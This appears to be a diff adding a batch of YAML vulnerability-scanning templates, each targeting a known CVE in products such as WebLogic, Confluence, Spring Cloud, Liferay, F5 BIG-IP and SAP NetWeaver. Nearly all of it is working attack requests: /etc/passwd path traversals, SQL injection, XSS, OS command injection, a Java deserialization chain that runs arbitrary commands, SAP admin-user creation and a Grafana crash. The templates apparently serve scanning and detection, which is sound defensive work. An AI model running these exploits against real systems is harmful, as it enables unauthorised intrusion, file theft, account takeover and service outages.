part: body
- type: word
words:
- "Content-Disposition: attachment; filename=all-contacts.csv;"
part: header
- type: status
status:
- 200

View File

@ -0,0 +1,20 @@
id: CVE-2019-2588
info:
name: Oracle Business Intelligence Path Traversal
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"
- "{{BaseURL}}:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"
matchers-condition: and
matchers:
- type: word
words:
- 'for 16-bit app support'
- type: status
status:
- 200

View File

@ -0,0 +1,41 @@
id: CVE-2019-2725
info:
name: Oracle WebLogic Server - Unauthenticated RCE
author: dwisiswant0
severity: critical
# Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services).
# Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0.
# Easily exploitable vulnerability allows unauthenticated attacker
# with network access via HTTP to compromise Oracle WebLogic Server.
# Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
# --
# References:
# > https://paper.seebug.org/910/
requests:
- method: POST
path:
- "{{BaseURL}}/_async/AsyncResponseService"
- "{{BaseURL}}:7001/_async/AsyncResponseService"
body: >-
<?xml version="1.0" encoding="UTF-8" ?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:ads="http://www.w3.org/2005/08/addressing">
<soapenv:Header></soapenv:Header>
<soapenv:Body></soapenv:Body>
</soapenv:Envelope>
matchers-condition: and
matchers:
- type: word
words:
- "soapenv:Envelope"
part: body
- type: word
words:
- "X-Powered-By: Servlet"
part: header
- type: status
status:
- 200

View File

@ -0,0 +1,30 @@
id: CVE-2019-3396
info:
author: "Harsh Bothra"
name: "Atlassian Confluence Path Traversal"
severity: High
# https://github.com/x-f1v3/CVE-2019-3396
requests:
- raw:
- |
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Referer: {{Hostname}}
Content-Length: 168
Connection: close
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<param-name>contextConfigLocation</param-name>"

View File

@ -0,0 +1,19 @@
id: CVE-2019-3799
info:
name: Spring-Cloud-Config-Server Directory Traversal
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- 'root:[x*]:0:0:'
part: body

View File

@ -0,0 +1,23 @@
id: CVE-2019-5418
info:
name: File Content Disclosure on Rails
author: omarkurt
severity: medium
# reference: https://github.com/omarkurt/CVE-2019-5418
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
Accept: ../../../../../../../../etc/passwd{{
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

View File

@ -0,0 +1,30 @@
id: CVE-2019-6112
info:
name: WordPress Plugin Sell Media v2.4.1 - Cross-Site Scripting
author: dwisiswant0
severity: medium
# A Cross-site scripting (XSS) vulnerability
# in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress
# allows remote attackers to inject arbitrary web script or HTML
# via the keyword parameter (aka $search_term or the Search field).
# --
# References:
# > https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b
requests:
- method: GET
path:
- "{{BaseURL}}/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "id=\"sell-media-search-text\" class=\"sell-media-search-text\""
- "alert(1337)"
condition: and
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,39 @@
id: CVE-2019-7609
info:
name: Kibana Timelion Arbitrary Code Execution
author: dwisiswant0
severity: critical
# Kibana versions before 5.6.15 and 6.6.1
# contain an arbitrary code execution flaw in the Timelion visualizer.
# An attacker with access to the Timelion application could send a request
# that will attempt to execute javascript code.
# This could possibly lead to an attacker executing arbitrary commands
# with permissions of the Kibana process on the host system.
# --
# References:
# - https://github.com/mpgn/CVE-2019-7609
requests:
- method: POST
path:
- "{{BaseURL}}/api/timelion/run"
- "{{BaseURL}}:5601/api/timelion/run"
headers:
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55"
Content-Type: "application/json; charset=utf-8"
body: "{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}"
matchers-condition: and
matchers:
- type: word
words:
- "seriesList"
part: body
- type: word
words:
- "Content-Type: application/json"
part: header
- type: status
status:
- 200

View File

@ -0,0 +1,22 @@
id: CVE-2019-8449
info:
name: JIRA Unauthenticated Sensitive Information Disclosure
author: Harsh Bothra
severity: medium
# source:- https://www.doyler.net/security-not-included/more-jira-enumeration
requests:
- method: GET
path:
- '{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '{"users":{"users":'
part: body

View File

@ -0,0 +1,31 @@
id: CVE-2019-8451
info:
name: JIRA SSRF in the /plugins/servlet/gadgets/makeRequest resource
author: "TechbrunchFR"
severity: medium
# On September 9, Atlassian released version 8.4.0 for Jira Core and Jira Software, which included a fix for an important
# security issue reported in August 2019.
# CVE-2019-8451 is a pre-authentication server-side request forgery (SSRF) vulnerability found in
# the /plugins/servlet/gadgets/makeRequest resource. The vulnerability exists due to “a logic bug” in the JiraWhitelist class.
# An unauthenticated attacker could exploit this vulnerability by sending a specially crafted web request to a vulnerable
# Jira server. Successful exploitation would result in unauthorized access to view and potentially modify internal
# network resources.
# https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
# https://twitter.com/benmontour/status/1177250393220239360
# https://twitter.com/ojensen5115/status/1176569607357730817
requests:
- method: GET
path:
- '{{BaseURL}}/plugins/servlet/gadgets/makeRequest?url=https://{{Hostname}}:1337@example.com'
headers:
X-Atlassian-token: no-check
matchers:
- type: word
name: ssrf-response-body
words:
- '<p>This domain is for use in illustrative examples in documents.'
part: body

View File

@ -0,0 +1,20 @@
id: CVE-2019-8903
info:
name: Totaljs - Unathenticated Directory Traversal
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "apache2.conf"
part: body

View File

@ -0,0 +1,19 @@
id: CVE-2019-8982
info:
name: Wavemaker Studio 6.6 LFI/SSRF
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

View File

@ -0,0 +1,22 @@
id: CVE-2019-9978
info:
name: WordPress social-warfare RFI
author: madrobot & dwisiswant0
severity: critical
# Reference:- https://github.com/mpgn/CVE-2019-9978
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://burpcollaborator.net"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Burp Collabolator Server"
part: body

View File

@ -0,0 +1,26 @@
id: CVE-2020-10199
info:
name: Nexus Repository Manager 3 RCE
auhtor: hetroublemakr
severity: high
# reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
requests:
- method: POST
path:
- '{{BaseURL}}/rest/beta/repositories/go/group'
headers:
Content-Type: application/json
body: '{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ 1337 * 1337 }"]}}'
matchers-condition: and
matchers:
- type: word
words:
- "1787569"
part: body
- type: status
status:
- 400

View File

@ -0,0 +1,24 @@
id: CVE-2020-10204
info:
name: Sonatype Nexus Repository RCE
auhtor: hetroublemakr
severity: high
# reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
requests:
- method: POST
path:
- '{{BaseURL}}/extdirect'
body: '{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{1337*1337"]}],"type":"rpc","tid":28}'
matchers-condition: and
matchers:
- type: word
words:
- "1787569"
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,35 @@
id: CVE-2020-1147
info:
name: RCE at SharePoint Server (.NET Framework & Visual Studio) detection
author: dwisiswant0
severity: critical
# Ref:
# - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147
# - https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html
requests:
- method: GET
path:
- "{{BaseURL}}/_layouts/15/listform.aspx?PageType=1&ListId=%7B13371337-1337-1337-1337-133713371337%7D"
matchers-condition: and
matchers:
- type: word
words:
- "List does not exist"
- "It may have been deleted by another user"
part: body
condition: and
- type: word
words:
- "Microsoft-IIS"
- "X-SharePointHealthScore"
- "SharePointError"
- "SPRequestGuid"
- "MicrosoftSharePointTeamServices"
condition: or
part: header
- type: status
status:
- 200

View File

@ -0,0 +1,29 @@
id: CVE-2020-12720
info:
name: CVE-2020-12720 vBulletin SQLI
author: pdnuclei - projectdiscovery.io
severity: critical
# Source https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
# This template supports the detection part only.
# Do not test any website without permission
# https://github.com/swisskyrepo/nuclei-templates/blob/20179794c2030144ec85f0231a8d455b5d7e35c5/cves/CVE-2020-12720.yaml
requests:
- raw:
- |
POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1
Host: {{Hostname}}
Accept: */*
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Content-Length: 218
Content-Type: application/x-www-form-urlencoded
nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-
matchers:
- type: word
words:
- "vbulletinrce"

View File

@ -0,0 +1,41 @@
id: CVE-2020-13167
info:
name: Netsweeper WebAdmin unixlogin.php Python Code Injection
author: dwisiswant0
severity: critical
# This template exploits a Python code injection in the Netsweeper
# WebAdmin component's unixlogin.php script, for versions 6.4.4 and
# prior, to execute code as the root user.
# Authentication is bypassed by sending a random whitelisted Referer
# header in each request.
# Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
# Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
# been confirmed exploitable.
# References:
# - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
# - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
requests:
- method: GET
path:
# Payload on hex: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out
- "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5"
- "{{BaseURL}}/webadmin/out"
headers:
Referer: "http://{{Hostname}}/webadmin/admin/service_manager_data.php"
User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)"
Connection: "close"
matchers-condition: and
matchers:
- type: word
words:
- "nonexistent"
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,21 @@
id: CVE-2020-13379
info:
name: Unauthenticated Grafana DoS
author: pxmme1337
severity: medium
# Source:- https://www.exploit-db.com/exploits/48638
# WARNING
# This vulnerability results in complete crashing of the grafana-server application.
requests:
- method: GET
path:
- '{{BaseURL}}avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D'
- '{{BaseURL}}/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D'
- "{{BaseURL}}/"
matchers:
- type: status
status:
- 502

View File

@ -0,0 +1,45 @@
id: CVE-2020-17505
info:
name: Artica Web Proxy 4.30 OS Command Injection
author: dwisiswant0
severity: high
# Artica Web Proxy 4.30.00000000
# allows an authenticated remote attacker
# to inject commands via the service-cmds parameter in cyrus.php.
# These commands are executed with root
# privileges via service_cmds_peform.
# -
# References:
# > https://blog.max0x4141.com/post/artica_proxy/
requests:
- raw:
- |
GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Connection: close
- |
GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Connection: close
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- "array(2)"
- "Position: ||whoami||"
- "root"
condition: and
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,41 @@
id: CVE-2020-17506
info:
name: Artica Web Proxy 4.30 Authentication Bypass
author: dwisiswant0
severity: critical
# Artica Web Proxy 4.30.00000000
# allows remote attacker to bypass privilege detection
# and gain web backend administrator privileges
# through SQL injection of the apikey parameter in fw.login.php.
# -
# References:
# > https://blog.max0x4141.com/post/artica_proxy/
requests:
- method: GET
path:
- "{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
redirects: true
max-redirects: 1
matchers-condition: and
matchers:
- type: word
words:
- "artica-applianc"
- type: status
status:
- 200
- 301
- 302
condition: or
- type: word
name: session
words:
- "PHPSESSID"
part: header
extractors:
- type: kval
kval:
- "PHPSESSID"

View File

@ -0,0 +1,20 @@
id: CVE-2020-2096
info:
name: Jenkins Gitlab Hook XSS
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/gitlab/build_now%3Csvg/onload=alert(1337)%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<svg/onload=alert(1337)>"
part: body

View File

@ -0,0 +1,24 @@
id: CVE-2020-3187
# Reference: https://twitter.com/aboul3la/status/1286809567989575685
info:
name: CVE-2020-3187
author: KareemSe1im
severity: High
requests:
- method: GET
path:
- "{{BaseURL}}/+CSCOE+/session_password.html"
matchers-condition: and
matchers:
- type: word
words:
- webvpn
- Webvpn
part: header
- type: status
status:
- 200

View File

@ -0,0 +1,19 @@
id: CVE-2020-3452
# Source: https://twitter.com/aboul3la/status/1286012324722155525
info:
name: CVE-2020-3452
author: pdteam
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../"
matchers:
- type: word
words:
- "INTERNAL_PASSWORD_ENABLED"
- "CONF_VIRTUAL_KEYBOARD"
condition: and

View File

@ -0,0 +1,24 @@
id: CVE-2020-5284
info:
name: Next.js .next/ limited path traversal
author: Harsh & Rahul & dwisiswant0
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/_next/static/../server/pages-manifest.json"
matchers-condition: and
matchers:
- type: regex
regex:
- '\{"/_app":".*?_app\.js"'
part: body
- type: word
words:
- "application/json"
part: header
- type: status
status:
- 200

View File

@ -0,0 +1,22 @@
id: CVE-2020-5405
info:
name: Spring Cloud Directory Traversal
author: Harsh Bothra
severity: High
# source:- https://nvd.nist.gov/vuln/detail/CVE-2020-5405
requests:
- method: GET
path:
- '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

View File

@ -0,0 +1,21 @@
id: CVE-2020-5410
info:
name: Directory Traversal in Spring Cloud Config Server
author: mavericknerd
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}:8080/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
- "{{BaseURL}}:8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

View File

@ -0,0 +1,64 @@
id: CVE-2020-5902
info:
name: F5 BIG-IP TMUI RCE
author: madrobot & dwisiswant0 & ringo
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license"
- "{{BaseURL}}/hsqldb%0a"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
- "BIG-IP release ([\\d.]+)"
- "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}"
- "HSQL Database Engine Servlet"
condition: or
part: body
- raw:
- |
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
command=create%20cli%20alias%20private%20list%20command%20bash
- |
POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d
- |
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
command=list%20%2Ftmp%2Fnonexistent
- |
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
command=delete%20cli%20alias%20private%20list
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "h3ll0_w0Rld"

View File

@ -0,0 +1,37 @@
id: CVE-2020-6287
info:
name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard)
author: dwisiswant0
severity: critical
# Affected Versions: 7.30, 7.31, 7.40, 7.50
# p.s:
# > Don't forget to change the default credentials
# > to create new admin in associated file:
# > `payloads/CVE-2020-6287.xml`
# Ref:
# - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287
requests:
- payloads:
data: "payloads/CVE-2020-6287.xml"
raw:
- |
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml; charset=UTF-8
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>{{base64('data')}}</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
matchers-condition: and
matchers:
- type: word
words:
- "urn:CTCWebServiceSi"
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,27 @@
id: CVE-2020-7209
info:
name: LinuxKI Toolset 6.01 Remote Command Execution
author: dwisiswant0
severity: critical
# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
# https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
requests:
- method: GET
path:
- "{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=1%3Becho%20%22bm9uZXhpc3RlbnQ%3D%22%20%7C%20base64%20-d"
headers:
User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)"
matchers-condition: and
matchers:
- type: word
words:
- "nonexistent"
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,60 @@
id: CVE-2020-7961
info:
name: Liferay Portal Unauthenticated RCE
author: dwisiswant0
severity: critical
# Deserialization of Untrusted Data in
# Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers
# to execute arbitrary code via JSON web services (JSONWS).
# -
# References:
# > https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html
requests:
- payloads:
command:
- "systeminfo" # Windows
- "lsb_release -a" # Linux
- "sysctl kern.ostype" # macOS
port:
- "80"
- "443"
- "8080"
attack: sniper
raw:
- |
POST /api/jsonws/invoke HTTP/1.1
Host: {{Hostname}}:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
Content-Length: 4938
Accept: */*
Accept-Language: en
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData
X-Requested-With: XMLHttpRequest
cmd2: command
Accept-Encoding: gzip, deflate
cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D
matchers-condition: and
matchers:
- type: word
words:
- "Microsoft Corporation"
- "Distributor ID"
- "kern.ostype"
condition: or
part: body
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- "Microsoft Windows (.*)"
- "kern.ostype: (.*)"
- "Distributor ID: (.*)"

View File

@ -0,0 +1,24 @@
id: CVE-2020-8091
info:
name: TYPO3 Cross-Site Scripting Vulnerability
author: dwisiswant0
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/typo3/contrib/websvg/svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert(31337),this.x=1}//"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "31337"
part: body
- type: word
words:
- "application/x-shockwave-flash"
part: header

View File

@ -0,0 +1,20 @@
id: CVE-2020-8115
info:
name: Revive Adserver XSS
author: madrobot & dwisiswant0
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
part: body
regex:
- (?mi)window\.location\.replace\(".*alert\(1337\)

View File

@ -0,0 +1,22 @@
id: CVE-2020-8163
info:
name: Potential Remote Code Execution on Rails
author: tim_koopmans
severity: high
description: Tests for ability to pass user parameters as local variables into partials
# reference: https://correkt.horse/ruby/2020/08/22/CVE-2020-8163/
requests:
- method: GET
path:
- "{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

View File

@ -0,0 +1,33 @@
